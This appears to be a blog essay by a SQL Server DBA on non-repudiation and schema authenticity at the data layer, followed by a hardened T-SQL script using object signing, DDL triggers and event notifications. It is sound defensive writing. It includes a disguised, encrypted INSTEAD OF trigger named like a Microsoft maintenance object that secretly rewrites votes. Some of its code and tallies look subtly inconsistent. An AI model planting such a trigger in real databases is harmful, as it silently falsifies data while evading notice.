Digital Non-Repudiation is about distributed communication authenticity. Non-repudiation in the digital security context is a proactive design concept intended to simulate the authentication of a fully witnessed hand written authorization. Evidence that this is a hard problem is found in the still widespread requirements for notarized hand written signatures.
Non-repudiation as a data layer design element has been widely rejected as unnecessary and invalid because the database is an implicitly trusted internal resource. Why would anyone want to verify their own signature and what real use could it serve? Most argue that protecting the endpoint is protecting the data layer. While there is some short term profitability in that position, the breakdown in data layer authenticity is rife with nightmare stories. It is silly to ignore these well established risks just because non-repudiation alone does not solve the whole problem, yet that seems to be the status quo.
Elevation of authority and man-in-the-middle attacks are wide spread and. Most often with absolutely no detection or prevention measures in place. Furthermore, the sophistication of attackers as well as known exploitable attack vectors are increasing due mostly to neglect.
One major authenticity risk area must be forgery or fakery of referenced objects at the data layer. Even in a change controlled SQL Server database, objects and configuration can be modified in ways that are not reflected in the current version in the source control system. It is common for shops that develop T-SQL to rely upon periodic forced re-synchronization between the “current” source control “version” and the actual objects on a SQL Server under that version. It is essential to eliminate this drift. No matter how astute the data access monitoring (DAM) tools are, if you do not have the T-SQL source truly under control you don’t have much in the way of authenticity.
Modes of Authenticity
To combat forgery and fakery a method to determine the authenticity of the other ‘players’ in a given communication is required. Players in a database communication could include client applications, users, server instances, databases, tables, stored procedures, functions, triggers, queues, ACLs, network switchgear, etc. Unless your DAM tools can fully verify object authenticity you are not doing enough. Consider this table that lists several ways to communicate along with some authenticity qualities for each communication method:
|signed in triplicate||signed copy||deniable signature||durable|
|signed and notarized||Public Notary||inconvenient||+ trusted authenticator
|signed network communication||trust broker||posers & rogues||external authenticity|
|data access||SQL principal hierarchy
||posers & rogues||authorization|
|DML objects||SQL catalog||posers & rogues||principal of least privilege|
|signed DML objects||SQL encryption hierarchy||rogues||schema object authenticity|
Whether schema authenticity at the data layer is non-repudiation at the network layer is unimportant provided there is some acceptance for using the strengths and strengthening weaknesses of authenticity in various architectural styles of communication and at all of the various structural layers. Only to the degree that looking at the conceptual premises of non-repudiation can that concept help provide a strong authenticity at the data layer.
T-SQL attacker that obtains an ability to connect with elevated sysadmin or dbo SQL Server credentials are unstoppable from carrying out their will in the database.
Uers with dbo database credentials – including the sysadmin server role members that are automatically made dbo when they enter any database, have implicit permissions to change all database configuration and object definitions in ways that will alter results returned to the application yet go undetected by the application or by internal database signature validation of the objects directly involved in legitimate database operations
There is always a plausible scenario where a currently trusted credential with elevated authority can unexpectedly become an attacker armed with sysadmin or dbo authority
Any credential with administrative access within the operation system or network cannot be prevented from gaining sysadmin and/or dbo access to the database
login access based non-repudiated protocols cannot assure the authenticity of any database operation or activity.
In non-repudiation, about all that is required is common access of the two parties to a public/private key pair (CREATE CERTIFICATE) to certify the communication. The objective of non-repudiation is mostly to assure that everyone gets the message at a pragmatic level. Non-repudiation doesn’t care what the two parties do to obtain their credentials or what happpens after the communication or even if the information exchange was useful and necessary. Only that both credentials are able to participate and usually to impose an altered state during the communication.
“Non-repudiation protocols are designed for verifying that, when two parties exchange information over a network, neither one nor the other can deny having participated to this communication.” (Klay & Vigneron)
Obviously, the ‘parties’ in a database operation that runs completely within the SQL Server’s memory space do not normally exchange information over a network. But they certainly can if someone wants that functionality — or injects that functionality. Likewise, there should be no argument that the ‘two parties’ in a database operation are really two software components of a common host most of time and in fact are more likely to be three or more components than the always dyadic constraint of communication between so called network endpoint. The party can grow quite large when you start looking at all the database objects that get involved – and thus can be manipulated maliciously – in a database operation. Limiting the communication at the database to two external parties is beyond unrealistic. This goes to a very important point I wish to establish above all else in this post: a malicious user can easily obtain credentials holding elevated authority in the database and so can easily modify the database in ways that can significantly alter the database and/or the data returned.
At the sports book where I did a little DBA work one clever syndicate (organized group of thieves and crooks) figured out how to flip their bets to the winner on the over and under at just the instant between the end of a game or contest somewhere in the world and when the internal business layer automation could settled the wagers for the event. As far as I know it was never possible to say they were actually caught either… It is nothing short of astonishing that this could have been done without insider assistance. If you saw the complexity of what they had done to manipulate wagers and the thoroughness used to cover their tracks you would surely agree. Yet “it was outsiders” seems to be the conclusion they (the management team mostly but Interpol and even Scotland Yard were involved somehow – so I was told anyway) reached in the investigation. This all even before the crooks began to get an idea anyone was on to them, but nabbing international attackers is not such an easy thing to do; to some (large?) extent due to corruption I’m betting. Another part of this particular scam involved playing poker with the dishonest winnings against another syndicate member and losing intentionally to launder the ill-gotten winnings from the tainted account where the bit had been flipped into an account not directly tied to the hack prior to cashing in. (Probably a good table to be sitting at for the honest gambler too!) I was never really in on the skinny but did hear a few of the details: investigators somehow decided that there was no insider involved. I even once was shown a drivers license photo of the supposed top guy in the syndicate from the other side of the world. I also finally got a tepid OK I had been so far hopelessly seeking to reduce the permissions used by legacy application level SQL Logins. Still could not get them to budge on using Windows Authentication because they could not get their act together to move away from the 1 ginormous data set connected directly to scads of web servers in a so called DMZ architecture. No idea how it ended with the attackers. I had no choise but to move on to hotter fires. This was simply the sort of thing that went on continuously in that industry although these guys were a little more insidious – and a little more successful – than most crooks. I continue to see that the state of siege that the on-line sports book has been under for the last 10 years is ever more pervasive all across the Internet.
It is the rare application that is able to detect let alone respond to the morphing or injection of data and database objects or the resulting illicit run time activity that follows. Pretty sure that statement can be applied to all flavors of database. For T-SQL application layers to be aware of the integrity of the data at that layer I know to be both quite possible and almost never done. In extension of older shitty developer foibles (e.g., it compiles so it works, I go one right answer so it is correct, etc), the accepted practice instead is an existential presumption of authenticity of referenced database objects. (e.g. tables, stored procedures, functions, triggers, views, permissions, users, roles, certificates, etc.)? For the most part, this presumption relies upon the intrinsic hierarchical role based security model and blind confidence in the integrity of the system(s). This is slightly more realistic when only a trusted few are able to access the database from a role at the top of the hierarchy and most staff have highly restricted or revoked access only.
True mitigation mandates far more than is now done. I must reiterate that greed for profit by doing as little as you can get away with is the primary driver of today’s lack of security. To wit, it is obviously necessary to vigilantly assure that all relevant schema objects and configuration settings have not changed. Especially when changed in such a way that the result of database operation are altered? Only when there is certainty about the integrity all relevant schema objects would it be possible to certify the authenticity of any database operation. I need an example to even feel like I am explaining my premise adequately.
A Facetious, Fictitious, Farcical Far Too Likely to be True Example
Consider this schema that inserts a Boolean value using a stored procedure. There is no other functionality. Period.
create table dbo.tally ( id int identity(1,1) PRIMARY KEY , user_choice BIT ); go create proc dbo.submit_choice ( @choice BIT ) as insert dbo.tally (user_choice) values (@choice); go
Let’s say this is a temporary polling station set up in an office kitchen restricted to employees – and anyone else that can gain access to the offices – and freely accessible to all employees of a business. The poll promises an anonymous result yet with a stated request (rule of trust) that only employess vote, everyone only vote once: there is no way to tell who placed any vote. The kitchen user’s are asked if they would like to discontinue catered snacks and lunches in the kitchen in response to a widespread outcry after a recent outbreak of food born illness among workers when the potato salad was left out over the weekend. The polling station is a re-purposed laptop placed on the end of the kitchen counter, next to the toaster, with text instructions for the one question survey loaded into Notepad on the desktop telling kitchen users how to open the SSMS query tool, the single user name and password needed to the connect to database and examples of using a stored procedure from an SSMS query connection to place a vote. The exact syntax for yes and no can be copied from notepad and pasted into SSMS query tool as is a reminder for “each user to PLEASE! vote only once”. There is also the query that will be used to determine the result so anyone can see the current tally. Not a second thought is given to security or user interface due to the high confidence that only authentic and authorized employees will vote.
-- YES - paste this to query window and execute to vote yes exec dbo.submit_choice 1; -- NO - paste this to query window and execute to vote no exec dbo.submit_choice 0; -- this query will determine the winner select TOP(1) user_choice as [winner] , count(*) AS votes from dbo.tally group by user_choice order by votes desc;
OK, so people drop in an few votes and somone queries to see how things look:
exec dbo.submit_choice 'no'; exec dbo.submit_choice 'no'; exec dbo.submit_choice 'yes'; exec dbo.submit_choice 'no'; select TOP(1) user_choice as [winner] , count(*) AS votes from dbo.tally group by user_choice order by votes desc;
The result, of course, is
winner votes ------ ----------- no 3
That looks right to me.
What no one could have known is that a militant raw vegan PETA loony colleague – a web developer with adequate SQL skills and exceptional attitude that actually did not use the kitchen much because of her now 4 year running raw vegan ‘fad’ diet – would be one of the first to enter the kitchen after the voting begins. This person’s naked agenda is the abolition of meat and meat by products from the human diet by all non-violent means possible. She pops open the connection to the database as described in the note and needs only a few seconds to understand the schema and the stored procedure, a moment to think and a few keystrokes to add a trigger that would assure the outcome yet risk minimal additional scrutiny that might be caused by a completely outlandish results.
create trigger dbo.MSIndexMaintenance on dbo.tally with encryption
instead of insert
as set nocount on; insert dbo.tally (user_choice) select case when ( t.now < .55 ) then 1 else i.user_choice end from inserted as i cross join (select sum(cast(user_choice as float))/count(*) as now from dbo.tally ) as t;
after running the exact same set of inserts again (remember the other 4 votes are already there)
exec dbo.submit_choice 'no'; exec dbo.submit_choice 'no'; exec dbo.submit_choice 'yes'; exec dbo.submit_choice 'no'; select TOP(1) user_choice as [winner] , count(*) AS votes from dbo.tally group by user_choice order by votes desc;
There are now 8 rows in the table. Two (2) rows should hold the value zero (no). The other six (6) should be 1 (yes). Right? The result from the summary query is now:
winner votes ------ ----------- yes 4
This may explain why so many corporate kitchens have gone vegan! What’s worse (better?), signature checking of the compiled objects to establish a non-repudiated communication would not have helped the bottom line of a single feedlot or hot dog factory. The signature of a SQL Server table is unaffected by the addition, modification or removal of a trigger or a permission placed on that table.
Adding a trigger is not the only hi-jinx possible. A Synonym pointing to a Linked Server location that replaces the table is another possibility for ‘stealing’ the vote. Or how about simply adding the trigger logic to the stored procedure? Other possibilities may occur to the reader. Many exist.
The example shows the ease and stealth with which the T-SQL outcome can be manipulated. The result is made invalid and any claim of authenticity left looking foolish by the facts after a hack if steps are not taken to assure schema authenticity at all times. This hole in the signature is comparable to the utility company allowing you one electrical outlet that does not go through the meter (guess where I plug everything in).
One thing is for sure: the hackers will continue to bang away at Microsoft implementations in search of vulnerabilities as long as Windows is a leader in the server space. And if there is a problem it will continue to become known before too many people get stomped on. However, some will always feel the boot. I can only hope it does not become known with my data… Notice I mention only Windows and not SQL Server. That is because an elevation of authority attack will most likely occur before the stolen highly privileged user credentials are use to gain database access. The only other real possibilities are an insider attack or SQL Injection combined with patience and plenty of today’s poor development practices.
Of course the base farcical ‘mistake’ in the example application is reliance upon the honesty of people. That is not a problem limited to technology. Almost every activity of modern life makes this mistake of foolish trust to one degree or another. It is admittedly presented as self portrait in caricature in the example.
In computer applications trust is used as an acceptable calculate risk in the interest of making the fast buck. On the Internet, even that friend, loved one, colleague or boss can be convincingly spoofed. The only rule you need to stay digitally safe, especially when the Internet is in the picture is, “trust no-one”. Most of us step over that boundary far every time we move and seldom if ever realize it. We forget that computers are not people any more than corporation are people or politicians are honest.
To be sure, there are many other errors in design in the made up example. Some even intentional. For example, the presumption that the data is safe because it is in a secure physical location is not only fallacious but obviously proved to be an invalid assumption based solely on hope. Neither blind faith or speculative design principles will produce authentic results.
So, the status quo is that database operations do no need to meet the test of non-repudiation. OK, fine. Wrong, but nothing I can do anything about as a DBA. What I cannot and will not agree with is the unspoken consequential decision to simply not worry about authenticity at the data layer. It makes my head spin to think too long about all the ways the integrity of a database operation can be maliciously corrupted or compromised. Although non-repudiation sets a pretty low bar for authenticity because it presumes that communication is dyadic and because it has no interest in the process, only the credentials presented by the participants.
Simplistic shared secret verification a la non-repudiation is inadequate to assure communication authenticity in SQL Server. Many changes to an object’s component attributes (i.e., indexes, triggers, permissions, etc.) and dependencies (i.e., called objects and referenced tables) are not encapsulated by an object’s signature when signed using T-SQLs ADD SIGNATURE statement. For example, object signing alone on a table does not see any CREATE/ALTER/DROP of triggers or indexes on the table or any GRANT/DENY/REVOKE permission applied to that table. Likewise changing the table in a way that does invalidate the signature would do nothing to the T-SQL signature of a stored procedure that references the table or a trigger attached to the table.
Toward Authenticity at the Data Layer
Actions to gain some confidence in the authenticity of database operation include:
- Control Change. Allow only schedule, reviewed and well tested changes. Be unequivocal about this. You can’t just shoot for only planned change too, and always hold the door open for occasional one-off as long as it meets the established sniff test, reviews and standards. Be willing to adjust the standard to improve results.
- Limit change. Limit the number of individuals that can apply changes to the environment and limit the the number of changes any individual can make to only and exactly those needed to do what they do. Always precisely align the permissions of the database user with the access required by the user (principle of least privilege).
- Digitally sign all objects in the schema at creation. Use a fully secures private key infrastructure and then ‘continuously’ verify that the signature of self and all legitimately referenced objects are in tact at every instant during run-time. The private key of a certificate can be removed from the SQL Server when not needed to help protect the private key. (Object signatures can be verified using T-SQLs IS_OBJECTSIGNED() function without the private key yet a signature cannot be reapplied until the private key is restored.) Consider a password signed certificate with a very strong password when security requirements granularity for the key is not aligned with the role/principal hierarchy.
Silently monitor for changes. An asynchronous process that captures all change is essential for monitoring and forensics. One method is to use EVENT NOTIFICATIONS that include all DDL_DATABASE_LEVEL_EVENTS. Log and protect the log from unauthorized access. Maintain high confidence that not only the message but also the message delivery system is not compromised. Any process able to leverage dbo or sysadmin authority can compromise any SQL Server change control system; including event notifications.
- Proactively prevent unauthorized change. The intersections of authority for a role based provisioning model and the permissions based access model can create threat holes. Some users end up with more access than they need. The most likely suspect is when an group from the domain, tree or ACL is plopped into a role in SQL Server. Most never know what they can do. The easiest way to become convinced is to try to plug a hole and then listen to ’em complain. A DDL trigger can roll back all DDL_DATABASE_LEVEL_EVENTS to stop change by all users. And it does except for changes to the DDL trigger by users that have ALTER ANY DATABASE DDL TRIGGER or DROP TRIGGER permissions. One hardening step is to add another identical triggers making it not possible to drop either trigger – unless the user first disableds one trigger and then then drops the other first. SQL Trace, to, can see DISABLE TRIGGER events. An alert from a custom trace event watching for the text “DISABLE TRIGGER” could be configured to protect against DISABLE TRIGGER. This actually could be effective in restricting a dbo authorized attacker in some scenarios but would be just another trivial obstacle for a sysadmin authorized attacker. Without exhaustive regression testing and extensive redundancy there can be no confidence of protection.
- Encrypt Sensitive Data. Use encryption hierarchy(ies) that require strong password(s) or encryption based on keys not available to [other] database users. It is recommended that secure on-site and off-site backups of all keys be maintained and fully secured at all times. Restrict key management to a very small group of well trained and absolutely trusted users. Furthermore, always require cooperative change rules of trust within the key management infrastructure (separation of responsibility).
- Verify schema integrity with each execution at run time. The most straightforward verification might be to compare the object tree in the schema to a hardcoded static list encapsulated in an encrypted and signed object. The object holding the static list cannot be changed – by any user – without the loss of the signature as the object is changed. Unattended users must not be able to reapply the well protected signature thus reducing the check for change to an inexpensive IF EXISTS to verify the signature on the catalog view of encrypted objects filtered by the key/cert of your signature. In other – even more secure? – scenarios it may provide more confidence to include signed data value validation between executable database objects a la non-repudiation. Complementary to object signing, there should be some assurance that the object signature or key used are not compromised. Also the verification must include all reference objects – expected or unexpected. Consider signing a parameter or introducing signatures based on a different well protected key than the one used to sign the objects between called database objects to build greater confidence in the objects authenticity. The key of the data signature gives you an additional common shared local resource that is expected to be difficult to compromise for cross-validation of the objects’ authenticity.
- Use system encryption for all objects (WITH ENCRYPTION). This helps prevent the uninvited from following along and provides the added benefit of protecting strong and long secrets that can be compiled into encrypted objects without risk of exposure as clear text. Even the combination of DML object Encryption and SQL Trace’s built-in encryption statement obfuscation masks are hardly effective run-time secret protections at this time. (Windows Debugger attackers may still be able to steal secrets from buffers as clear text. It is possible to make sure live systems do not have the necessary debugger symbols.) As a DBA there is nothing more frustrating than trying to support a 3rd party database with encrypted objects. I will do what I can to avoid that thankless task but that doesn’t make me right on the matter. Encrypting yourself is not so painful because you can unencrypt when you want.
- Disable database-chaining and trustworthy database options. This will reduce the exposure to cross database elevation of authority attacks.
- Don’t help hackers with error details. Watch the @@NESTLEVEL value in CATCH block and always use try-catch error handling. When @@NESTLEVEL = 0 then the error is on the command line and should not be displayed. WHEN the NESTLEVEL = 1 then the caller is a command line and any error information should not be returned to the command line call. When @@NESTLEVEL > 1 then return just enough information to the caller for locating the logged error.
This is merely a listing of some practices necessary to be confident in the authenticity at the data layer. Fleshing out the requirements is a never ending thought problem for all at this time. Without meeting all measures in combination, database data is not safe from posers ( including elevation of authority attackers, brute force password attackers, SQL Injection attackers, etc.) – and the rogue insiders. There is always more that can and should be done. For example in highly secured settings it may be worthwhile to sign object interactions by using a technique that looks a lot like non-repudiation. Eventually security always succumbs to the greed mantra (aka law of diminishing returns) and the level of perceived risk (aka hope). I think it moves us ahead to acknowledge that perfect security is not attainable but must remain always and forever be the objective.
A revised application with much higher assurance of object authenticity based upon that insert into a bit column would look a bit different. The example revision explodes the original applications 10 lines script to create the database objects to over 200 lines of T-SQL.
:SETVAR SIGNATURE_PASSWORD "a_$1LLY-n-str0nG_fraze" CREATE DATABASE test; ALTER DATABASE test SET TRUSTWORTHY OFF; ALTER DATABASE test SET DB_CHAINING OFF; GO USE test; -- silent monitor CREATE QUEUE DDLChangesQueue WITH RETENTION = ON; CREATE SERVICE DDLChangesService ON QUEUE DDLChangesQueue ( [http://schemas.microsoft.com/SQL/Notifications/PostEventNotification] ); CREATE EVENT NOTIFICATION DDLChanges ON DATABASE FOR DDL_DATABASE_LEVEL_EVENTS TO SERVICE 'DDLChangesService', 'current database' ; GO ALTER AUTHORIZATION ON DATABASE::test TO sa; GO CREATE ROLE testAdministrator; -- add current user to role DECLARE @CreateUserDDL NVARCHAR(512); SET @CreateUserDDL = N'CREATE USER [' + ORIGINAL_LOGIN() + N']; EXEC sp_addrolemember ''testAdministrator'', ''' + ORIGINAL_LOGIN() + N'''' ; EXEC sp_executesql @CreateUserDDL; GO -- cert encrypted by DMK CREATE CERTIFICATE SigCert ENCRYPTION BY PASSWORD = '$(SIGNATURE_PASSWORD)' WITH SUBJECT = 'object signatures' ; GO CREATE TABLE dbo.tally ( Id UNIQUEIDENTIFIER NOT NULL -- int identity(1,1) , User_choice BIT ); GO ADD SIGNATURE TO dbo.tally BY CERTIFICATE SigCert WITH PASSWORD = '$(SIGNATURE_PASSWORD)'; GO -- does not affect signature of table CREATE CLUSTERED INDEX ixc_tally ON dbo.tally(user_choice); GO CREATE PROC dbo.submit_choice ( @choice BIT ) AS BEGIN BEGIN TRY IF (SELECT IS_OBJECTSIGNED('OBJECT' , @@PROCID , 'CERTIFICATE' , thumbprint ) + IS_OBJECTSIGNED('OBJECT' , OBJECT_ID( 'dbo.tally', 'U' ) , 'CERTIFICATE' , thumbprint ) + IS_OBJECTSIGNED('OBJECT' , OBJECT_ID( 'dbo.trg_tally', 'TR' ) , 'CERTIFICATE' , thumbprint ) + ( SELECT COUNT(*) AS [NbrTriggers] FROM sys.triggers WHERE parent_id = OBJECT_ID( 'dbo.tally', 'U' ) AND object_id <> OBJECT_ID( 'dbo.trg_tally', 'TR' ) ) FROM sys.certificates WHERE name = 'SigCert' AND object_name(@@PROCID) = 'submit_choice' ) <> 3 RAISERROR('unable to verify object signatures',16,1); INSERT dbo.tally (user_choice) VALUES (@choice); END TRY BEGIN CATCH SELECT ERROR_NUMBER() AS ErrorNumber , ERROR_SEVERITY() AS ErrorSeverity , ERROR_STATE() AS ErrorState , ERROR_PROCEDURE() AS ErrorProcedure , ERROR_LINE() AS ErrorLine , ERROR_MESSAGE() AS ErrorMessage; END CATCH END GO ADD SIGNATURE to dbo.submit_choice BY CERTIFICATE SigCert WITH PASSWORD = '$(SIGNATURE_PASSWORD)'; GO CREATE PROC dbo.get_results AS SELECT user_choice as choice , rank() OVER (ORDER BY COUNT(*) DESC) AS rank , count(*) AS votes FROM dbo.tally GROUP BY user_choice ORDER BY rank DESC; GO ADD SIGNATURE to dbo.get_results BY CERTIFICATE SigCert WITH PASSWORD = '$(SIGNATURE_PASSWORD)'; GO -- instead trigger fires BEFORE constraints -- constraints are applied before after triggers CREATE TRIGGER dbo.trg_tally ON dbo.tally INSTEAD OF INSERT, UPDATE, DELETE AS BEGIN BEGIN TRY -- only inserts, only 1 row at a time IF (SELECT COUNT(*) FROM inserted) > 1 RAISERROR('no multi-row', 16, 1); IF (SELECT COUNT(*) FROM deleted ) > 0 IF (SELECT COUNT(*) FROM inserted) = 1 RAISERROR('no update', 16, 1); ELSE RAISERROR('no delete', 16, 1); INSERT dbo.tally (id, user_choice) SELECT NEWID(), user_choice FROM inserted; END TRY BEGIN CATCH SELECT ERROR_NUMBER() AS ErrorNumber , ERROR_SEVERITY() AS ErrorSeverity , ERROR_STATE() AS ErrorState , ERROR_PROCEDURE() AS ErrorProcedure , ERROR_LINE() AS ErrorLine , ERROR_MESSAGE() AS ErrorMessage; END CATCH END GO ADD SIGNATURE to dbo.trg_tally BY CERTIFICATE SigCert WITH PASSWORD = '$(SIGNATURE_PASSWORD)'; GO CREATE TRIGGER trg_ddlChanges1 ON DATABASE WITH ENCRYPTION FOR DDL_DATABASE_LEVEL_EVENTS AS BEGIN DECLARE @User NVARCHAR(128); BEGIN TRY SET @User = USER_NAME(); -- error if user making the change is not DataAdministrator -- even though IS_MEMBER('DataAdministrator') would be false IF NOT EXISTS ( SELECT * FROM (SELECT ddl.event.value('LoginName' , 'NVARCHAR(128)') AS LoginName FROM (SELECT EVENTDATA() AS change) this CROSS APPLY change.nodes('/EVENT_INSTANCE') AS ddl(event) ) q JOIN sys.database_role_members r ON q.LoginName = USER_NAME(r.member_principal_id) WHERE r.role_principal_id = USER_ID('DataAdministrator') ) AND @User <> 'cdc' RAISERROR('Invalid User %s',16,1,@User) WITH LOG; END TRY BEGIN CATCH ROLLBACK; RAISERROR('fatal error',20,1, @User) WITH LOG; END CATCH END GO DISABLE TRIGGER ALL ON DATABASE GO CREATE TRIGGER trg_ddlChanges2 ON DATABASE WITH ENCRYPTION FOR DDL_DATABASE_LEVEL_EVENTS AS BEGIN DECLARE @User NVARCHAR(128); BEGIN TRY SET @User = USER_NAME(); -- error if user making the change is not DataAdministrator -- even though IS_MEMBER('DataAdministrator') would be false IF NOT EXISTS ( SELECT * FROM (SELECT ddl.event.value('LoginName' , 'NVARCHAR(128)') AS LoginName FROM (SELECT EVENTDATA() AS change) this CROSS APPLY change.nodes('/EVENT_INSTANCE') AS ddl(event) ) q JOIN sys.database_role_members r ON q.LoginName = USER_NAME(r.member_principal_id) WHERE r.role_principal_id = USER_ID('DataAdministrator') ) AND @User <> 'cdc' RAISERROR('Invalid User %s',16,1,@User) WITH LOG; END TRY BEGIN CATCH ROLLBACK; RAISERROR('fatal error',20,1, @User) WITH LOG; END CATCH END GO GO ENABLE TRIGGER ALL ON DATABASE GO SELECT O.NAME , ISNULL(IS_OBJECTSIGNED( 'OBJECT' , o.object_id , 'CERTIFICATE' , c.thumbprint ), 0) as [IsSigned] , c.name FROM sys.objects o LEFT JOIN sys.crypt_properties cp ON o.object_id = cp.major_id LEFT JOIN sys.triggers t ON o.object_id = t.object_id LEFT JOIN sys.certificates c on cp.thumbprint = cp.thumbprint WHERE o.is_ms_shipped = 0 GO
The best prevention for unauthorized sysadmin level access to the database is to keep anyone and anything that should not be doing admin level work from connecting with admin level credentials. Limiting the number of sysadmins is also nice, but the reality is pretty much anyone that can set another users password or access the local system running SQL Server as a local Windows Administrator can find a way to connect to a SQL Server with sysadmin access. Once a connection to a SQL Server is established using valid credentials, there are no permissions, privileges, rights or roles that cannot be overridden by that sysadmin empowered connection. At this time only the protection from compromise of sensitive data by unauthorized sysadmin members looks possible. Any sysadmin can delete complete data rows, drop tables and even drop databases or corrupt the data: no matter what is done to prevent data compromise. It is only possible to prevent the sysadmin from knowing the meaning of encrypted data. A mildly determined malicious user with sysadmin authority and the intent to destroy data cannot be stopped from that goal. They can be delayed and – in most cases – identified after the fact. Delaying features are also useful to help show intent during Forensic . The best protections against the malicious insider are to hire trustworthy employees and to collect adequate forensic data into user protected containers. Ideally, an audit trail that cannot be modified by a sysadmin privileged user is needed.
The information protection of encryption/signing is durable provided the private key is safe. Encryption scrambles data with a public key that can later be unscrambled with a private key. In contrast, signing scrambles data with the private key of a key pair and later unscrambles the signature with the public key to verify the data. In either case, the encryption keys – especially the private key – must be safeguarded.
The simple act of successfully sharing a well protected key to sign and verify a signature is often considered adequate to establish non-repudiation. A weakness in this approach is the ease with which T-SQL can be manipulated without violating the signature. It is also necessary to verify that all other relevant schema elements continue to sport their signatures, that unsigned objects have not been introduces, and that none of the expected signed objects are missing.
A digital object that is expected to check its own signature is fatally flawed. This would be like airport security using the ‘honor system’ or nuclear power regulators deferring to the plant operators to establish safety levels or airline pilots left to judge their own soberness before flight. As we now know – self-policing strategies are effective in well over 99% of cases. And very cost effective… until there is an event that falls into the range of that other way less than 1 percent. A significantly more reliable and consistent outcome results when the signature is always verified by a trusty outsider. (Ultimately this is the reason that outside accounting firms are needed to count the votes in an awards show, there are observers at ballot locations, “fact checking” has become a political pastime and neighbors are nosey: simply to bear witness to the obvious and expose – or get mysteriously wealthy – over occasional anomalies.)
A higher assurance that any entity is what it claims it is is will come from a reliable source external and independent from that entity than from that entity itself. This is why auditors are in great demand and the words “Fact Checking” garner such attention in the title of an article or news story.” This external check could be done – in our scenario – by:
- introducing a trigger behind the table
- via a called module – a stored procedure – placed between the external request and the table operation
- as a check constraint or default value.
Also, to be able to claim the current process as the scope for verification of trust, the validity of each called module and referenced object needs to be verified before use and the signature of each calling module ought to be verified by the caller before returning control. That leaves defaults and constraints less useful since they may not occur with every process that uses the data.
A called stored procedure or a trigger will do. A view cannot be signed. It may be a little less confounding for the developer not to have to create two stored procedures to do one thing. Using a trigger also allows a division of responsibility and prevents everyone from having to know every business rule to succeed. Perhaps the DBA takes ownership of the triggers or called procedure(s) that verify authenticity of the participants allowing the developers to continue to code mostly unaffected by and unaware of the signature trigger logic and other defensive layers enveloping the application logic. All in all, a trigger is probably a better way to impose corroboration than the addition of a second stored procedure IMHO, but not by much. One of the few scenarios when triggers are in fact appropriate: to assure the encryption complexity does not get in the way of progress! On the other hand, if the database supports abstraction layers (ORM, OOP) that will suffer serious side effects or degradation from a trigger an additional stored procedure or view introduced into this now obviously secondary secure application is mandated to assure the authenticity of the communication.
If you are looking for this level of assurance of authenticity through your ORM – fagetaboutit. Man-in-the-middle protection at the ORM data access layer is essential but must be done well outside the bounds of the data layer. You still want to do everything described to protect and monitor at the database server. In addition, it is necessary to apply similar protection at the ORM layer.
FWIW: the original hack – tacking on an instead trigger – no longer works due to the one instead trigger per action limitation. The legitimate trigger uses up the one allowed trigger on all three actions.